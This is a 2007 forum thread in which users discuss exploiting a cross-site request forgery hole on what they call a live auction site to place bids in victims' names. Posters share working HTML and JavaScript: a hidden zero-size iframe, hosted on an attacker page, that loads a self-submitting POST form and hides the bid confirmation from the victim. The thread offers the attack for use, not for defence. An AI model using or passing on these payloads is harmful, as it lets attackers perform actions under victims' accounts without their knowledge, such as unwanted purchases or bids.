I found a CSRF vulnerable site. It's an auction site, kind like ebay. Session riding is effective only when POSTed, but I've managed that with forms and simple JavaScript (found in WhiteAcid's XSS POST forwarder) that submits form automatically. Almost perfect... the problem is that every time the bid is placed via CSRF the user gets redirected to a site which informs him/her that: "...the bid was placed successfully and bla, bla, bla..." Is there any way to circumvent that redirection or at least to control where the user gets redirected.

Have you tried using a hidden iframe?

Damn, I completely forgot iframes :) Thanx for reminder CrYpTiC_MauleR. It works like a cham...

guys, can show an example with hidden iframe? I am pretty lousy at this man. I need examples to enlighten me. Thanks in advance

http://hackathology.blogspot.com

<iframe width=0 height=0 src="h++p://attacker.com/form_post.html" style="visibility: hidden"></iframe>

where form_post.html contains the self submitting form:

<form method=post id='a' action='h++p://victim.com/bid.php'><input type=hidden name='userid' value='342'><input type=hidden name='bid' value='140'></form><img src onerror="var a=document.getElementById('a');a.submit();history.go(-1)">

I'm assuming at least that that's what CrYpTiC_MauleR and /nul were referring to

-tx @ lowtech-labs.org

Actually I did it almost like tx described:

Page bid1.html contains:
<iframe src="bid2.html" style="width:0px; height:0px; border:0px"></iframe>

Where bid2.html contains POST parameters:
<form name="csrf" method="post" action="http://www.mybidsite.com/index.php">
<input type="text" name="param1" value="my bid">
<input type="text" name="param2" value="1 USD">
</form>
<script>document.csrf[0].submit()</script>

Now, all you have to do is redirect user to bid1.html :) In my case it worked like a cham. I am really amazed that (some) people doesn't take CSRF seriously...



Edited 1 time(s). Last edit at 08/21/2007 04:00PM by /nul.